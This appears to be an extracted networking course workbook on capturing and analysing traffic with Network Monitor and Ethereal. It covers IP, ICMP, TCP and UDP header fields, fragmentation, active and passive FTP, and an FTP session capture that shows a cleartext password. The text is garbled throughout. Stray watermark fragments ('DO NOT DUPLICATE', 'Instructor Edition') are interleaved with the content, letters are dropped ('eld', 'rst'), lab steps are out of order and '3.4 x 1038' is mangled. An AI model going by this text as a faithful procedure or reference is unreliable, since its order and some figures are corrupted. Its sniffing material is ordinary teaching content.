If you are on the LEFT side of the classroom, ping the IP address 172.16. 0.1. If you are on the RIGHT side of the classroom, ping the IP address 172.18.0.1. This will create network traffic for you to capture. Wait for 30 to 40 seconds. As you wait, watch the realtime statistics change in the Network Monitor Capture window. Choose CaptureStop And View. You should now see the Display View, including the timeline of the packets captured.
8. 9.
10. Double-click any packet to change to the Detail View.
12. Choose DisplayFilter.
13. Select Protocol==Any, and click the Edit Expression button. 14. With the Protocol tab selected, click the Disable All button. 15. Scroll down to ICMP, select ICMP, and click the Enable button. The Expression eld at the top of the dialog box should now display Protocol == ICMP. Click OK.
ru ct
Ethereal
st
promiscuous mode: Normally an Ethernet interface reads all address information and accepts follow-on packets only destined for itself, but when the interface is in promiscuous mode, it reads all information (sniffer), regardless of its destination.
To perform promiscuous mode captures on a Windows machine, you have to rst download and install the latest version of WinPcap (at least WinPcap 2.3); do not install any alpha or beta versions. WinPcap is the Windows equivalent of libpcap (LIBrary for Packet CAPtures) for Linux. It can be obtained at http:// winpcap.polito.it. In fact, you will use WinPcap later in the course, along with other tools such as windump, tcpdump, nmap, and snort. If you need to download Ethereal, be sure to get at least version 0.9.11. It can be obtained at www.ethereal.com.
28
In
DO
NO
Another product that you can use to capture data is called Ethereal. With Ethereal, data can be captured off the wire or read from a captured le. Data can also be saved to a le in a format that Microsofts Network Monitor can understand. The current version of Ethereal (0.9.11) can analyze over 300 Data Link, Network, Transport, and Application layer protocols.
DU
PL
19. Close Network Monitor.
IC
18. Choose FileSave As, and save the capture as First_Capture.cap, in the default location.
or
17. Observe that only ICMP frames are visible in your window now.
AT
16. Click OK to implement this lter on your capture.
Ed
iti
11. Observe the structure of the three panes in this view, and expand any + signs displayed in the middle pane.
on
TASK 1B-2
Installing and Starting Ethereal
1. 2. 3. 4.
Copy the les WinPcap_2_3.exe and ethereal-setup-0.9.11.exe to this folder. Your instructor will tell you where to obtain these les.
Double-click WinPcap_2_3.exe, accept all defaults, including agreeing to the licensing agreement, and wait for the install to complete. Double-click ethereal-setup-0.9.11.exe, agree to the licensing agreement, leave all options set to the defaults, including the default installation folder. When the install is done, click Close.
Ethereal Overview
Ed
T DU PL IC
5.
Once it has been installed, to run Ethereal, double-click the icon for Ethereal on the desktop, or choose (from the Start menu) Programs EtherealEthereal.
st
In
DO
ru ct
NO
or
AT
When you rst start Ethereal, you will see a GUI with three panes. The top pane lists the captured frames in sequence. When you highlight a frame, the middle pane provides protocol layer information about that frame, and the bottom pane shows the details of the frame in both Hex and ASCII values.
E
29
iti
on
Create a folder called Ethereal at the root of your Windows 2000 boot partition (for example, C:\).
Ed
Figure 1-12: The Ethereal GUI.
or
DO NO
ru ct

Whether you want to limit a capture to a particular size. Whether you want to capture packets in promiscuous mode (you will need WinPcap to do so). Any capture lters you want to apply. The name of the le you want to save your captures to (you can do this later as well). Whether you want to view the captures as they are being captured (via windump). Parameters dening when the captures should be stopped. Whether you want to enable or disable name resolution at the Data Link, Network, and Transport layers.
30
In
st
When you want to start a capture, navigate to the menu at the top and choose CaptureStart. You can also start a capture with the Ctrl+K key combination. When you do so, you will see a dialog box asking you to specify the following: The interface to capture from.
DU
PL
Above the top frame there is a menu bar, with File, Edit, Capture, Display, and Tools menus towards the left side, and at the right corner theres a Help menu. Below the bottom frame, you will see four buttons: the Filter button, a dropdown bar, the Reset button, and the Apply button.
IC
AT
iti
on
Ed or
DO NO T
Figure 1-14: Ethereal pop-up displaying capture information.
In
st
DU
When you click OK, capture will start on the selected network interface and you will see another pop-up informing you of that. Ethereal will continue with the capture until you click the Stop button.
ru ct
Figure 1-13: Ethereals Capture Options dialog box.
PL
IC
AT
E
31
iti
on
After you stop a capture, you can view it. Then when you are done and want to save the capture for future reference: 1. 2. 3. 4. Choose FileSave or FileSave As. Provide the location to the folder where you want to save the le. Click File Type and specify the output format. Click OK to save the le.
Ed or
DO NO
ru ct
TASK 1B-3
Figure 1-15: The many Save As options in Ethereal.
st
Using Ethereal
Setup: Ethereal has been successfully installed and is running on your computer.
In
1. 2.
Choose CaptureStart to display the Capture Options dialog box. Observe the list of network interfaces displayed in the Capture Options dialog box. The network interfaces are listed differently than in Network Monitor.
32
Notice how many choices you have for saving a captureyou can save to Network Monitors format if you want. (Conversely, Ethereal will read a capture saved by any of the protocol analyzers in the list.) When you are done with capture and analysis and want to close the program, choose FileQuit or press Ctrl+Q.
DU
PL
IC
AT
iti
on
3. 4. 5. 6. 7. 8. 9.
Select the network interface you want to perform the capture on. In this case, you would select the Classroom Hub interface. Verify that you have selected Promiscuous mode capture. Click OK. Ping your routers IP address. Click Stop to stop and view the capture.
To make sure you know which interface is the right one, start Regedit, and navigate to HKEY_LOCAL_ MACHINE\SYSTEM\ CurrentControlSet\Services\ Tcpip\Parameters\Interfaces, which displays network interfaces with Hex values (the same way Ethereal lists them). Select an interface, and look for the string value IPAddress. Find the interface whose IP address is 172.16. 10.x (if you are seated on the LEFT side of the class) or 172.18.10.x (if you are seated on the RIGHT side). Jot down the rst few Hex characters (just enough to uniquely identify the interface), close Regedit, switch back to Ethereal, and select the network adapter whose Hex values match the characters you recorded.
Double-click any frame where your computer is the source, the router is the destination, and the protocol is ICMP. View the frame details.
10. Verify that you can relate to these captures in much the same way as your earlier Network Monitor captures. 11. Close Ethereal.
TCP Connections
ru ct
TASK 1B-4
1. 2.
At a command prompt:
If you are on the RIGHT side of the classroom, enter telnet 172.18.0.1.
In
DO
If you are on the LEFT side of the classroom, enter telnet 172.16.0.1.
st
NO
Open Network Monitor, and start a capture.
Analyzing the Three-way Handshake
DU
PL
Remember, the three-way handshake is used by two hosts when they are creating a session. The rst host begins by sending out a packet with the SYN ag set, and no other ags. The second packet is a response with both the SYN and ACK ags set. The third part of the session establishment will have the ACK ag set.
or
AT
Earlier, you were introduced to the function of and the process of control ags, the three-way handshake, and the session teardown. In this section, you are going to use Network Monitor to view the three-way handshake, packet by packet, and to view the teardown, packet by packet.
Ed
IC
iti
on
If necessary, adjust the screen resolution so that you can access the OK button at the bottom of the Capture Options dialog box.
33
3.
When you are presented with a logon prompt for User Access Verication, press Enter repeatedly until your screen resembles the following graphic.
Minimize the Command Prompt window. 4. 5. 6.
Switch back to Network Monitor, and choose CaptureStop And View.
Once you have identied the frames that are part of the three-way handshake, based on the discussion, look for the following: a. In the rst frame, what are the SEQ number, ACK number, and ags?
c. 7. 8. 9.
In the third frame, what are the SEQ number, ACK number, and ags?
ru ct st
Using the Hex pane, identify the value for the ags that are set for each frame. Leave Network Monitor open, along with this capture, for the next task.
Previously, you examined the session teardown process. Here, you will examine the details of the session teardown. Remember, there are four parts of session teardown.
In
DO
NO
The Session Teardown Process
DU
PL
IC
Expand each of the three frames in the handshake, and examine them in greater detail in the Detail pane.
or
AT
b.
In the second frame, what are the SEQ number, ACK number, and ags?
Ed
In the Summary pane, identify the frames that are involved in the threeway handshake.
iti
on
TASK 1B-5
Analyzing the Session Teardown Process
1. 2. 3.
In the Summary pane, identify the frames that are involved in the session teardown.
Once you have identied the frames, examine them in greater detail in the Detail pane. In each frame, identify at least the following: a. Flags that are set. b. c. Sequence number. Acknowledgement number.
4. 5.
Save the capture as tcp_connections.cap and close the capture. Minimize Network Monitor.
Capturing and Identifying IP Datagrams
or
NO DO
ru ct
DU
Along with TCP, the protocol you will spend the most time analyzing will be IP. This protocol is the one that does the most work of the entire TCP/IP suite. In Figure 1-16, you can see the actual format of the IP datagram. There are seven rows of information in the gure, with the critical rows being the rst ve. When a computer receives an IP datagram, it will begin reading on Row One on the left side, bit by bit. Once it reads through Row One, it will read Row Two, and so on.
PL
To work with IP further, refer to RFC 791.
st
IC
IP Datagram, with All Fields Shown
In
AT
Topic 1C
Ed
E
35
iti
on
Setup: Network Monitor is running, and the last capture you performed is displayed.
Figure 1-16: An IP datagram with all elds shown.
or
DO NO
ru ct

The last eld on Row One is the eld called Total Length. This is a 16-bit eld that denes the length of the entire IP datagram in bytes. Starting on Row Two, on the left side is a eld called Identication. This is a 16-bit eld that denes each datagram sent by the host. The standard for this eld is for the identication value to increment by one for every datagram sent. Following the Identication eld is a eld called Flags. Not to be confused with the ags of TCP, which you have seen, this is a 3-bit eld that is used in conjunction with fragmentation. The rst of the three bits is to be set at 0,
In
st
Continuing to the right of Header Length is a eld called Type Of Service. This is an 8-bit eld that denes the quality of service for this packet. Different applications may require different needs of available bandwidth, and type of service is one way of addressing those needs.
DU
PL
Moving to the right of the Version is a eld called Header Length (IHL). This is a 4-bit eld that denes the number of 32-bit words in the header itself, including options. In most captures, this value will be 5, for no options set, the normal value.
IC
Using Figure 1-16, we will move through the header, identifying the function of each area. After identifying the header elds, we will use Network Monitor to capture and analyze the IP header. Starting on Row One, on the left side is a eld called Version. This is a 4-bit eld that denes the version of IP that is currently running. Right now, this will likely be a value of 4, as that is the current industry standardIPv4, or IP version 4. Some instances may be using IP version 6, or IPv6, which you will examine later in the course.
Ed
AT
iti
on
as a default. The next bit is known as the DF bit, or Dont Fragment. The third bit is known as the MF bit, or More Fragment. The last eld on Row Two is a eld called Fragment Offset. This is a 13-bit eld that is used to dene where in the datagram this fragment belongs. (If there is fragmentation, the rst fragment will have an offset of 0.)
Protocol ID Number 1: ICMP Protocol ID Number 6: TCP Protocol ID Number 17: UDP
ru ct
st
TASK 1C-1
Capturing and Identifying IP Datagrams
Setup: You are logged on to Windows 2000 as Administrator. A command prompt and Network Monitor are running. 1. 2. 3.
In
If necessary, enable the FTP service. In Network Monitor, start a capture, and leave this running. At the command prompt, enter ftp ip_address, where ip_address is the address of a neighboring computer.
DO
NO
The Seventh and nal Row is the representation of the data. By this point, the header is complete and the data the user wishes to send or receive is stored in the packet.
DU
The Sixth Row contains any options that may be present. This is a variable, with no absolute xed size to the options. Some of the options that may be in this eld are those that are related to routing or timekeeping. If options are used, there will be padding added so this eld equals 32 bits in size.
PL
IC
The Fifth Row is also a single eld, the Destination IP Address. This eld is a 32-bit value that identies the IP address of the destination host for this packet.
or
AT
The Fourth Row is a single eld, the Source IP Address. This eld is a 32-bit value that identies the IP address of the source host of this packet.
The nal eld on Row Three is a eld called Header Checksum. This is a 16-bit eld that is used to provide a check on the IP header only; this is not a checksum for any data following the header. This checksum provides integrity for the header itself.
Ed
iti
integrity: Assuring information will not be accidentally or maliciously altered or destroyed.
Moving to the right is a eld called Protocol. This is an 8-bit eld that is used to dene the upper-layer protocol that is in use for this datagram. There are many unique protocol numbers, and if you wish to study all of the numbers, please refer to RFC 790. However, the following list identies several important Protocol ID numbers:
on
37
Starting on Row Three, on the left side, is a eld called Time To Live. This is an 8-bit eld that is used to dene the maximum amount of time this datagram may be allowed to exist in the network. The TTL is created by the sender and lowers by 1 for every router that the datagram crosses. If the TTL reaches 0, the packet is to be discarded.
4. 5. 6. 7.
Log on as Anonymous. After you are logged on, enter quit to end the FTP session. Back in Network Monitor, choose CaptureStop And View to view the captured frames. Observe the Protocol column. We are interested only in the TCP and FTP frames. Apply a lter to show only TCP and FTP, and then double-click any FTP frame. For the specic steps to add lters, see Task 1B-1, step 12 through step 16. Examine the IP header, compared to the discussion. Look for the following: a. Version Number b. c. d. e. Time To Live Protocol ID Source Address Destination Address
8.
9.
Once you are done examining the IP header, save the capture as IP_Header.cap and close the capture.
Ed
T DU
st
ICMP Message, with All Fields Shown
Figure 1-17: An ICMP message with all elds shown.
38
In
DO
NO
To work with ICMP further, refer to RFC 792.
ru ct
When you are analyzing protocols, it should become immediately apparent that there are differences between ICMP and the other protocols discussed in this lesson. There is a similar concept in that the ICMP message is encapsulated in the IP datagram, just as you saw with TCP and UDP. In Figure 1-17, you can see the actual format of the ICMP message. There are only two rows of information shown in the gure.
PL
IC
Capturing and Identifying ICMP Messages
or
AT
Topic 1D
iti
on
Following Type on Row One is a eld called Code. This is an 8-bit value that works in conjunction with Type to dene the specic details of the ICMP message. For example, using Type 3, the Code could be 1, which is destination host unreachable. Moving along on Row One, the nal eld is called Checksum. This is a 16-bit value that checks the integrity of the entire ICMP message.
The Second Row has no xed elds. Depending on the Type and Code of the ICMP message, this eld may contain many things. One example of what may go in this eld is timestamping of messages.
TASK 1D-1
Capturing and Identifying ICMP Messages
Begin a new capture.
3. 4. 5. 6.
In Network Monitor, stop and view the capture.
ru ct
Scroll down the packets captured to identify ICMP messages, or create an ICMP lter.
Compare the messages to the discussion, looking for the following: a. Source IP Address c. d. e. Type
Code
7. 8.
In
Payload for ping
Save this capture as Valid_Ping.cap and close it. You are going to run another capture. Begin a new capture.
DO
b.
Destination IP Address
st
NO
Analyze the captured frames to identify the ping process between your computer and the host you pinged.
DU
PL
IC
2.
Switch to the command prompt, and ping a valid IP address of another host in your subnet. Wait for the ping to nish, and then minimize the command prompt.
or
1.
AT
E
39
Setup: You are logged on to Windows 2000 as Administrator. A command prompt and Network Monitor are running.
Ed
iti
on
Using Figure 1-17, we will move through the header, identifying the function of each area. After identifying the header elds, we will use Network Monitor to capture and analyze an ICMP message. Starting on Row One, on the left side, the rst eld is called Type. This is an 8-bit value that identies the specic ICMP message. For example, a Type could be 3, which is a type of unreachable message.
9.
Switch to the command prompt, ping a known invalid IP address for your network, wait for the ping to nish, and minimize the command prompt. For instance, if you were to ping the address 208.18.24.2, you should receive a message indicating that the request timed out. Or, if you are on the 172.16.10.0 network, you might try to ping the address 172.16.10. 201, as that address is unlikely to be in use on your network.
10. In Network Monitor, stop and view the capture.
11. Scroll down the packets captured to identify ICMP messages.
b. c. d.
Destination IP Address Type Code
13. Save this capture as icmpheader.cap, and close the capture.
Topic 1E
Ed
T DU
To work with TCP further, refer to RFC 793.
st
TCP Header, with All Fields Shown
In
Figure 1-18: A TCP header with all elds shown.
40
DO
ru ct
When investigating TCP/IP, you will nd that TCP data is encapsulated in the IP datagram. Since you have already looked into the IP datagram itself, at this stage you will examine TCP further. In Figure 1-18, you can see the actual format of the TCP header. There are seven rows of information in the gure, with the critical ones for this discussion being the rst ve. Just as with IP, when a computer receives the TCP header, it will begin reading on Row One on the left side, bit by bit. Once it reads through Row One, it will read Row Two, and so on.
or
NO
PL
IC
AT
Capturing and Identifying TCP Headers
iti
12. Analyze the captured frames, and compare them to the discussion, looking for the following: a. Source IP Address
on
The second eld on Row One is a eld called Destination Port Number. This is a 16-bit eld that denes the upper-layer application that is using TCP on the destination host. The combination of an IP address and a port number is often called a socket. A socket pair identies both ends of a communication completely, by using the host IP address and port and the destination IP address and port. Moving onto Row Two, the entire row is a single eld called Sequence Number. This is a 32-bit value that identies the unique sequence number of this packet. The sequence numbers are used to track communication and are part of the reason TCP is considered a connection-oriented protocol.
or
DO NO
URG: If this is a 1, the Urgent ag is set. PSH: If this is a 1, the Push ag is set.
ACK: If this is a 1, the Acknowledgement ag is set. RST: If this is a 1, the Reset ag is set.
FIN: If this is a 1, the Finish ag is set.
For a detailed discussion on the ags and their functions, please review that section earlier in this lesson.
In
Following the Control Flags on Row Four is a eld called Window Size. This is a 16-bit value that identies the number of bytes, starting with the one dened in the Acknowledgement eld, that the sender of this segment is willing to accept. Moving on to Row Five, on the left side, there is a eld called TCP Checksum. This is a 16-bit value that is used to provide an integrity check
st
SYN: If this is a 1, the Synchronize ag is set.
T
DU
After the Reserved eld are the six Control Flags. Each ag is only 1 bit, either on or off. There are six control ags, and they are listed as follows in the left-to-right order they occupy in the TCP header:
ru ct
PL
Moving to the right is a eld called Reserved. This is a 6-bit value that is always left at 0 for functioning hosts using TCP/IP. It is not used for any normal network traffic.
IC
AT
E
41
Continuing on to Row Four, starting on the left side is a eld called Offset (sometimes also called Header Length). This is a 4-bit value that denes the size of the TCP header. Because this is a 4-bit value, the limit on the size of the header is 60 bytes. If there are no options set, the size of the header is 20 bytes.
Ed
In Row Three, you can see that the entire row is also a single eld, called Acknowledgement Number. This is a 32-bit value that provides a response to a sequence number. Under normal operations, this value will be the value of the sequence number of the last packet received in this line of communication, plus 1. There will be a value in this eld only if the ACK ag is turned on (ags are in the next row).
iti
on
Using Figure 1-18, we will move through the header, identifying the function of each area. After identifying the header elds, we will use Network Monitor to capture and analyze the TCP header. Starting on Row One, on the left side is a eld called Source Port Number. This eld is a 16-bit number that denes the upper-layer application that is using TCP on the source host.
of the TCP header and the TCP data. The value is calculated by the sender, then stored and the receiver compares the value upon receipt. Following the TCP checksum on Row Five is a eld called Urgent Pointer. This is a 16-bit value that is used if the sender must send emergency information. The pointer points to the sequence number of the byte that follows the urgent data, and is only active if the URG ag has been set. The Sixth Row has only one eld, called Options. This is a 32-bit value that is often used to dene a maximum segment size (MSS). MSS is used so the sender can inform the receiver of the maximum segment size that the sender is going to receive on return communication. In the event that the options set do not take up all 32 bits, padding will be added to ll the eld.
Capturing and Identifying TCP Headers

Setup: You are logged on to Windows 2000 as Administrator. A command prompt and Network Monitor are running.
Ed
T DU
TASK 1E-1
2.
3. 4. 5. 6. 7.
st
b. c. d.
Acknowledgement Numbers Source Port Numbers Destination Port Numbers
In
8.
Once you have analyzed the header, save the capture as Telnet_Attempt.cap, and close the capture.
42
DO
ru ct
If the Telnet session starts, exit the Telnet session; otherwise, close the command prompt. Stop and view the capture.
Add a lter so that all you see are TCP frames. For the specic steps to add lters, see Task 1B-1, step 12 through step 16.
When analyzing the headers, look for the following: a. Sequence Numbers
NO
Analyze the TCP headers in the frames.
PL
IC
Switch to the command prompt and initiate a Telnet session to a neighboring host. Whether or not it connects at this time is not important, so the Telnet service does not need to be on.
or
AT
1.
Begin a new capture.
iti
The Seventh and nal Row is the representation of the data. By this point, the header is complete and the data the user wants to send or receive is stored in the packet.
on
Topic 1F
Capturing and Identifying UDP Headers
Ed
T DU PL IC
Figure 1-19: A UDP header with all elds shown.
The second eld on Row One is called Destination Port Number. This eld is a 16-bit value that denes the upper-layer application that is using UDP on the destination host. On the Second Row, the eld on the left is called UDP Length. This is a 16-bit value that identies the length of the UDP data and the UDP header.
The second eld on Row Two is a eld called UDP Checksum. This is a 16-bit value that is used to provide an integrity check of the UDP header and the UDP data. The value is calculated by the sender, then stored, and the receiver compares the value upon receipt.
st
TASK 1F-1
Working with UDP Headers
1.
In
Setup: You are logged on to Windows 2000 as Administrator, and Network Monitor is running.
Browse your course CD-ROM to nd a folder called \085545\Data\ Captures. In that folder is a le called tftp.cap. Open tftp.cap in Network Monitor.
DO
NO
Row Three is where the actual user data is stored. It is possible for a user to send a UDP datagram with zero bytes of data.
ru ct
or
AT
Using Figure 1-19, we will move through the header, identifying the function of each area. After identifying the header elds, we will use Network Monitor to capture and analyze the UDP header. Starting on Row One, on the left side is a eld called Source Port Number. This eld is a 16-bit value that denes the upper-layer application that is using UDP on the source host.
E
43
iti
on
To work with UDP further, refer to RFC 768.
Compared to TCP, UDP is a very simple transport protocol. The UDP header and data will be completely encapsulated in the IP datagram, just as with TCP. In Figure 1-19, you can see the actual format of the UDP header. There are three rows of information in the gure. Just as with TCP, when a computer receives the UDP header, it will begin reading on Row One on the left side, bit by bit. Once it reads through Row One, it will read Row Two, and so on.
UDP Header, with All Fields Shown
2.
Expand the details of any UDP frame, and compare it to the discussion. Look for the following: a. b. c. Source Port Destination Port What the actual UDP data is
3. 4.
As you are analyzing this traffic, verify that no session was established, as UDP is connectionless. Close the capture.
Analyzing Packet Fragmentation
or
DO NO
ru ct
Ethernet: 1500 bytes FDDI: 4352 bytes
Fragmentation Rules
The default IP Maximum Datagram Size is 576 octets.
In
The ofcial minimum MTU is 68, and the maximum is 65535.
44
st
Fragmentation will rarely happen at the source of a datagram, but it is possible. For example, if a receiving host says it can accept segments that are many times larger than what the sender normally sends. Another example would be a host on a small-packet-sized network, such as PPP, and using an application with a xedsize message. The common location then for fragmentation is at a gateway, where the odds of different MTUs on different interfaces are very high. The following list shows the MTU for various media: PPP: 296 bytes
Token Ring (4 MB/s): 4464 bytes Token Ring (16 MB/s): 17914 bytes
The default TCP Maximum Segment Size is 536 octets.
DU
TCP segments are sent using IP datagrams. TCP expects a one-to-one ratio of segments to datagrams. Therefore, IP on the receiving end must completely reassemble the datagram before handing the segment to TCP. In the relationship between TCP and IP, the following rules that affect fragmentation are dened: The TCP Maximum Segment Size (MSS) is the IP Maximum Datagram Size minus 40 octets.
PL
IC
AT
In the event that a datagram gets fragmented, it is not reassembled until it reaches its nal destination. When the datagram is fragmented, each fragment becomes its own unique packettransmitted and received uniquely.
Packet-switched networks will all, at one time or another, experience fragmentation. This is due to the fact that all complex networks are made up of various physical media and congurations. So, a packet of a certain size might t ne on one segment, but may suddenly be many times larger than the capacity of the next segment. The size limit that is allowed to exist on a network varies from network to network and is referred to as the Maximum Transmission Unit (MTU).
Ed
iti
Topic 1G
on
Figure 1-20: How fragmentation works.
TASK 1G-1
Analyzing Fragmentation
Ed
T DU PL IC
1. 2. 3. 4.
On the course CD-ROM, navigate to the \085545\Data\Captures folder, and open fragment.cap in Network Monitor. Expand the details of frame 1, looking for the Fragment ag.
Observe that, in frame 1, there is no Fragment Offset, as this is the rst fragment.
Select several consecutive frames. Observe that each successive frame has a higher Fragment Offset as it gets farther from the beginning of the original datagram.
6. 7. 8.
Expand the details of frame 16.
Close the capture.
In
DO
Observe that the Fragment ags are now both 0, indicating this is the last of the fragments.
st
NO
5.
Observe that the IP ID stays constant for each fragment.
ru ct
or
AT
E
45
iti
on
How Fragmentation Works
Topic 1H
Analyzing an Entire Session
About the Tasks
TASK 1H-1
Ed
T DU
In the following tasks, Windows 2000 Network Monitor was used to capture a ping between two hosts and an ftp session between two hosts. The ping and ftp commands were run from the command prompt, and the output saved to the text les ping.txt and ftp.txt, respectively. The Network Monitor captures were saved to les ping.cap and ftp.cap, respectively. You can open the TXT les with Notepad to see the commands and responses. You can open the CAP les with Network Monitor and see the frames captured as a result. Lets take a look.
st
In
2.
Keep this le open.
46
DO
ru ct
1.
Start Notepad, and open the le ping.txt. This le is on your course CD-ROM, in the \085545\Data\Captures folder. You should see the output shown in the following graphic.
NO
PL
IC
Objective: To use the supplied capture and text les to examine the TCP/IP headers, in order to understand how a session is set up, used, and torn down.
or
AT
Performing a Complete ICMP Session Analysis
iti
on
Now that you have analyzed IP, TCP, UDP, ICMP, fragmentation, handshakes, and teardowns, it is time to put them together. In this topic, you will follow along using two sample captures that were made specically for this purpose. One capture is a PING capture, and the other is an FTP capture. By analyzing them, you will see completely how TCP/IP functionsfrom start to nish.
3. 4.
Switch to Network Monitor, and open the le ping.cap. Its also located on your course CD-ROM, in the \085545\Data\Captures folder. Observe that frame 1 is an Ethernet broadcast trying to resolve the target IP address to its MAC address.
Ed
5.
ru ct st In
DO
NO
T
DU
PL
IC
Observe that frame 2 is a reply from the target machine with the appropriate resolution. From now on, the two hosts can communicate.
or
AT
E
47
iti
on
6.
Observe the next two frames. They are ICMP echo messages going back and forth between the two hosts, corresponding to the output in the text le. Examine the ICMP messages, and see the details in frames 3 and 4 as shown in the following graphics.
Ed or ru ct st In
7.
Observe that, for the ping command, no session was set up or torn downjust a simple ICMP echo request, followed by an ICMP echo reply.
DO
NO
DU
PL
IC
AT
iti
on
Continuing the Complete Session Analysis

In the last task, one host successfully pinged another, in preparation for establishing an FTP transaction. Well look at the FTP portion of the session, but before we do, a quick differentiation between active and passive FTP is in order.
Up to this point you have been examining ICMP communication. Now you will examine an active FTP session. There are two different types of FTP, something that many administrators are unfamiliar with. The two FTP types are simply called passive and active. The mode most people think of with FTP is active FTP. In active FTP, a client makes a connection to the FTP server. The client uses a port higher than 1024 (well call it X) to connect to the server, which then uses port 21, and the FTP command and control session is established. The server responds with the data transfer, sent on port 20. The client will receive the data transfer on a port one higher than the client used for command transfer, or X+1.
ru ct
st
In
DO
NO
Passive FTP solves this problem on the rewall, as both parts of the FTP session originate from the FTP client, and no session starts from an untrusted network. There is a different problem with passive FTP. This problem is not on the rewall, but on the server conguration itself. Because the FTP client starts both sessions, the FTP server must be able to listen on any high port, meaning all high ports must be open and available. To deal with this situation, many FTP applications now include features that limit the port range that the server can use.
DU
PL
IC
When active FTP is used, there can be a situation that rewalls dislike. The rst part of the FTP session, from client to server is not a problem. However, when the server responds to the client, it can seem to the rewall to be a new session started from an untrusted network, trying to gain access to the private network.
or
AT
In passive mode FTP, the client initiates both connections between the client and the server. When the FTP client begins an FTP session, the client opens two ports (again one higher than 1024, and the next port higher, or X and X+1). The rst connection and port is the session to the server for command and control on server port 21. The server then opens a random port (again higher than 1024, referred to as Y in this section), and sends this port information back to the client. The client then requests the data transfer from client port X+1 to server port Y.
Ed
E
49
iti
on
FTP Communication
TASK 1H-2
Performing a Complete FTP Session Analysis
Setup: You are logged on to Windows 2000 as Administrator. Notepad and Network Monitor are running. 1. Switch to Notepad, and open the le ftp.txt. This le is located on your course CD-ROM in the same folder as the other les. You should see the results shown in the following graphic.
Ed or
DO NO
ru ct
2.
Observe that, in this session, when the ftp server asks for a password, the user enters it but it is not recorded on screen.
In
st
DU
PL
IC
AT
iti
on
Objective: To use the supplied capture and text les to examine the TCP/IP headers, in order to understand how a session is set up, used, and torn down.
3.
Switch to Network Monitor, and open the le ftp.cap. You should see the results similar to those shown in the following graphics. (Depending on the version of Network Monitor you are using, MAC and IP addresses might be displayed in Hex, and the time might be in a different format.)
If you would like to change the format of the addresses from Hex to more readable names, choose Display Addresses, and click Add. In the box that is displayed, enter FTPSITE for the Name, add 002B32CFC72 for the Address, verify that the Type is Ethernet, and click OK. Click Add again, then enter LOCAL for the Name, add 0002B32C5B13 for the Address, verify that the Type is Ethernet, and click OK twice.
Ed or ru ct st
4.
In
There are 51 frames involved in this capture. If you would like to change the color of the FTP packets for easier viewing, choose DisplayColors. Scroll down and select FTP; then, from the Background drop-down list, select a mild color such as gray or teal, and click OK. If you select a darker color, it might make it more difficult to read the text.
DO
NO
DU
PL
IC
AT
iti
on
5.
Observe that frames 3, 4, and 5 represent the TCP handshake involved in establishing the session. Frames shaded gray (6, 8-9, 11-12, 14, 16-19, 23, 29, 31-34, 38, 44, and 46-47) are all directly involved with the ftp applicationauthentication, ftp requests for directory information, an actual le transfer, followed by a quit, and bye response.
7. 8.
Observe that in frame 9, you can see the request for a password. Observe that in frame 11, you can see the password being supplied. Isnt this a good enough reason to employ some secure authentication such as encryption? Lets view the three-way handshake frames in a bit more detail.
9.
Ed or ru ct st
Frame 3 starts the three-way handshake Active Open by setting the SYN bit to 1, offering source port no. 2025 (07E9 in Hex), while at the same time directing the request to port number 21 (15 in Hex) on the server. A sequence number 2052360112 (7A5487B0 in Hex) is associated with this frame to uniquely identify it, even in the event of multiple sessions between the same two hosts.
In
DO
NO
DU
PL
IC
AT
iti
on
6.
Observe that in frame 8, you can see the user name being supplied.
10. Lets look at the reply.
or
DO NO T
11. Observe that frame 5 includes an ACK from the client.
ru ct In st
Once the session is established, FTP can continue on with its setup. This includes a login and a password (to be supplied if anonymous access in not supported), followed by le requests.
DU
PL
IC
AT
E
53
The reply from the ftp server in frame 4 includes an ACK, while simultaneously including a SYN. This is the Passive Open.
Ed
iti
on
12. Observe that frame 6 shows the ftp server asking for user identication. Frame 8 shows the ftp client supplying the user name of testuser.
Ed
T DU
or st
In
DO
ru ct
NO
PL
IC
AT
13. Observe that this is met by the ftp server asking for the password in frame 9.
iti
on
14. Observe that in frame 11, you can see the password being offered. Because no secure methods for authentication were set up, you can see the actual password (the word plaintext).
Ed or
DO NO
15. Observe that once the user has been authenticated, the ftp session is allowed to continue. The ftp server puts out the welcome message shown in frame 12.
ru ct In st
T
DU
PL
IC
AT
E
55
iti
on
16. Observe that the rest of the frames dealing with FTPframes 14, 16-19, 23, 29, 31-34, 38, and 44have to do with directory listings and le transfers.
Ed or ru ct st
In
DO
NO
DU
PL
IC
AT
iti
on
In ru ct
NO IC AT T DU PL E
st or Ed iti on
DO
57
17. Observe that in frame 38, you can see the actual contents of the le as it is being transferred. In this case, and because it is just a text le, you can read the contents.
Ed or
DO NO
ru ct
In
st
DU
PL
IC
AT
18. Observe that in frame 46, you can see the client attempt to close the connection with the Quit command.
iti
on
19. Observe that in frame 47, you can see the server communicate with the client with the message See ya later.
Ed or ru ct st In
DO NO T DU PL IC
AT
E
59
iti
on
20. Observe that these messages are followed by TCP terminating the session from both ends in frames 48 and 49, and 50 and 51, respectively, where the FIN bits are set to 1 and the corresponding frame contains the ACK bit set to 1.
Ed or ru ct st
In
DO
NO
DU
PL
IC
AT
iti
on
Ed or ru ct st
22. Close Notepad. 21. Close Network Monitor. If you are prompted to save addresses, click No.
In
DO
NO
T
DU
PL
IC
AT
E
61
iti
on
Topic 1I
Fundamentals of IPv6
It has been estimated by the U.S. Census Bureau that by the year 2050 there will be over 9 billion people living on Earth. If we (for the moment, put economics aside) are to attempt to provide the full use of the Internet to every person on the planet, the current version of the Internet Protocol will likely be unable to handle the demand. When we do the math, we can quickly calculate that IP version 4, or IPv4, will allow for only 4 billion addresses. Even if we take into consideration technologies such as Network Address Translation (NAT), it becomes quickly obvious that an improvement is required. The need for IP addresses is also not taking into consideration the expected surge in PDAs, cell phones with Web access, and many other different types of devices that will connect to the Internet. It is reasonable to expect that every person on the planet will have a need for far more than one IP address. From an addressing perspective, you may wonder how many IPv6 addresses are available, when compared to IPv4. As you know, IPv4 is a 32-bit number, offering approximately 4 billion addresses. IPv6 addresses are 128-bit numbers, whichif you take the time to do the mathworks out to approximately 340 trillion, trillion, trillion addresses (or 3.4 x 1038). There are a few formatting issues, where a portion of the address space may not be used for single addresses; however, by most estimates, even after formatting, the low-end number that will remain is 35 trillion addresses. This should be more than enough addresses for each person on the planet having every device imaginable connected to the Internet, with many addresses remaining.
Ed
T DU
or
DO NO
IPv6 Addresses
IPv6 Address Formats
62
In
st
ru ct
IPv6 Addresses
